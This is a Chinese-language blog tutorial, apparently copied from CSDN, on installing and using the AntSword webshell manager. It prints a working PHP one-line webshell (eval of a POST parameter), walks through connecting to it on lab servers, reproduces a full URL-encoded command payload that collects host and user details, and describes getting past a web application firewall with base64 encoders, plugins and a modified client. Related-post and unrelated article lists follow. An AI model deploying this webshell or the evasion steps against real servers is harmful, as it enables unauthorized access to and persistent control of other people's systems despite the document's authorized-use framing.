中国蚁剑安装使用教程

  • 前言
  • 一、中国蚁剑安装
  • 二、中国蚁剑使用
    • 2.1中国蚁剑连接木马
    • 2.2中国蚁剑设置代理
    • 2.3中国蚁剑参数设置
    • 2.4中国蚁剑其他使用
  • 三、 中国蚁剑绕过Waf
    • 3.1 编码绕过WAF
    • 3.2插件绕过waf
    • 3.3 修改蚁剑绕过WAF
  • 总结

大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

  1. url填写http://192.168.93.129/muma.php

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

2.2中国蚁剑设置代理

  1. 首先点击设置

  1. 进行相应的配置


  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1
Host: 192.168.93.129:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

2.4中国蚁剑其他使用

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

如上所示,点击插件市场,进行插件下载

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF

中国蚁剑安装使用教程相关推荐

  1. 【网络安全】文件上传漏洞及中国蚁剑安装

    文件上传漏洞 描述 中国蚁剑安装 1. 官网下载源码和加载器 2.解压至同一目录并 3.安装 4.可能会出现的错误 文件上传过程 必要条件 代码示例 dvwa靶场攻击示例 1.书写一句话密码进行上传 ...

  2. 【蚁剑工具-01】网站管理工具之中国蚁剑安装过程详解以及应用实例

    目录 1 中国蚁剑安装及设置 1.1 下载 1.2 安装 1.3 相关设置 2 中国蚁剑应用实例 2.1 操作环境 2.2 具体步骤 3 总结 参考文章 任何人不得将其用于非法用途以及盈利等目的,也禁 ...

  3. 中国蚁剑下载、安装、使用教程

    文章目录 中国蚁剑下载.安装.使用教程 一.中国蚁剑下载 二.中国蚁剑安装 三.中国蚁剑使用 1.添加一个shell 2.插件 3.关于编码器 4.user-agent修改 中国蚁剑下载.安装.使用教 ...

  4. 中国蚁剑(antSword)下载、安装、安装出现的问题、使用教程

    前言: 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件. 中国蚁剑推崇模块化 ...

  5. 中国蚁剑(win32-x64)——安装报错:解压代码出错:[object Object]

    参考文章 中国蚁剑安装步骤(win10 64) 报错:解压代码出错:[object Object]

  6. 中国蚁剑AntSword

    中国蚁剑AntSword 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 参考文档 中国蚁剑下载.安装.使用教程_Sumarua的博客-C ...

  7. 我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它

    目录 一.中国蚁剑下载 二.中国蚁剑安装 第一步:解压后,打开加载器antsword-Loder文件,并运行AntSword.exe程序 第二步:再次打开AntSword.exe,就能再次运行了 三. ...

  8. 中国蚁剑下载安装以及插件的安装教程

    一,中国蚁剑下载 唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...

  9. 中国蚁剑的下载以及安装教程

    一,中国蚁剑下载 唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...

最新文章

  1. ArcGIS_系列中文教程下载
  2. 22.6. Query 查询
  3. resin3.1+apache2.2.8 整合(笔记)
  4. SD-WAN的体系结构是如何提高网络灵活性和效率?
  5. GraphPad Prism 平均值的标准误差
  6. OpenCV相交凸intersectConvex的实例(附完整代码)
  7. MySQL优化:数据量很大,分页查询很慢,有什么优化方案?
  8. SDL_main导致main找不到入口
  9. 如何清理 Weblogic Server 缓存
  10. 【Servlet】过滤器技术
  11. 【Python】Python3.7.3 - 闭包Closure技术
  12. 吴陆 java,成年人的世界,崩溃无声。
  13. cx_Oracle库导入失败引起crontab中python程序运行失败,并且无错误提示
  14. 26--学生签到 管理员页面功能(5) foreach
  15. 网站服务器需不需要装杀毒软件,服务器要不要装杀毒软件
  16. 关于microsoft html help workshop的一些草蛋问题
  17. 如何使用OpenCV-Python-dlib实现有关闭眼的检测、眨眼次数的计算?(附源码,绝对可用)
  18. window 删除文件报错显示被程序占用 强制删除被占用的文件
  19. 云原生计算动态周报2.13-2.20
  20. 行人重识别(4)——行人重识别(基于视频)综述

热门文章

  1. Python OpenCV 图片模糊操作 blur 与 medianBlur
  2. php 将二维数组翻译成多种语言
  3. 解决macOS Sierra WI-FI无法连接网络
  4. C++ 静态成员变量和静态成员函数
  5. 项目文件模板-项目章程
  6. 机器学习推导合集02-SVM简明入门1-硬边界SVM的建模过程
  7. 针对上网本和便携式设备的第一批MeeGo构架
  8. Racket编程指南——23 Racket和Scheme的方言
  9. java学习数据类型
  10. 题解报告:hdu 1846 Brave Game(巴什博弈)